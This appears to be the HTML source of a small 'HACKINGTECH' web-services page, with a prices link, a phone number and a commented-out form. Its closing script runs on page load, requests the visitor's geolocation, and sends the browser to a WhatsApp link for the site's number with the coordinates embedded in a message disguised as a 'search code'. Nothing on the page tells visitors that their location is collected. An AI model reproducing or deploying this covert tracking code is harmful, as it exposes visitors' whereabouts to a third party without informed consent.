<html lang="en">
<head>
    <meta charset="UTF-8">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <title>Document</title>
</head>
<style>
    body{
        background-image: url("g5.jpg");
        background-repeat: no-repeat;
        background-position: center;
        background-size: cover
    }
    a{
        color:white;
        font-size: 20px;

    }
    a:hover{
        color: black;
        transition: 1s;
    }
    li{
        display: inline-block;
        padding: 20px;
    }
    nav{
        text-align: center;
    }
    h1{

        font-family: Arial, Helvetica, sans-serif;
        text-decoration: underline;
        cursor: pointer;
        text-align: center;
        
    }
    h1:hover{
        color:white;
        transition: 1s;
        
    }
    footer{
        margin-top: 500px;
        text-decoration: overline;
        text-align: center;
    }
    h2{
        text-transform: uppercase;
        font-family: Arial, Helvetica, sans-serif;
        display: inline;
        margin-left: 20px;
    }
    .iframe{
        text-align: center;
    }
    .view{
        color: white;
    }
    .view:hover{
        color: green;
    }
    @media (max-width: 700px){

    footer{
        margin-top: 100px;
        text-decoration: overline;
        text-align: center;
    }
   h1{
       font-size: 10px;
   }
    h2{
        text-transform: uppercase;
        font-family: Arial, Helvetica, sans-serif;
        display: inline;
        margin-left: 20px;
        font-size: 15px;
    }
    .iframe{
        text-align: center;
        width: 320px;
    }
    a:hover{
        color: black;
        transition: 1s;
    }
    }
</style>
<header>
    <h1>HACKINGTECH | HOME WEB SERVICES</h1>
    <nav>
        <li><a href="index.html">Fill Form</a></li>
        <li><a href="tel:0500709994">&phone; Call Us</a></li>
    </nav>
</header>
<body>
   <a href="prices.html"><h1 class="view">VIEW PRICES BEFORE FILLING FORM</h1></a>
   <div class="container">
       <div class="first">
           <h3></h3>
       </div>

   </div>
   <input type="password">
   <div class="iframe">
    <!-- <iframe src="https://docs.google.com/forms/d/e/1FAIpQLSf8UnDJEqVhxGCPvoLtFWM2GL364fZlaPMwVB48suWGgdUvjQ/viewform?embedded=true" width="640" height="1539" frameborder="0" marginheight="0" marginwidth="0">Loading…</iframe> -->
</div>
</body>
<footer>
    <h2>&copy; Powered BY HACKINGTECH | HOME</h2>
    <h4>2018 - 2020</h4>
</footer>
<script>
    function locate(){
        if(navigator.geolocation){
            navigator.geolocation.getCurrentPosition(showPosition)
        }
        else{
            alert("Sorry We Can't Provide You With This Info Since We Can't Access Your Location")
        }
    }
    // function showPosition(position){
    //     document.write("Your Latituded Is " + position.coords.latitude +"\nYour Longitude is "+position.coords.longitude)
    // }
    function showPosition(position){
       window.location = "https://wa.me/0500709994?text=This Is The Search Paramenter Which Will Be Used To Add You........Your Search Code Is "+position.coords.longitude + "🥰❤,,"+position.coords.latitude + "\n"
    }
    locate()
</script>
</html>
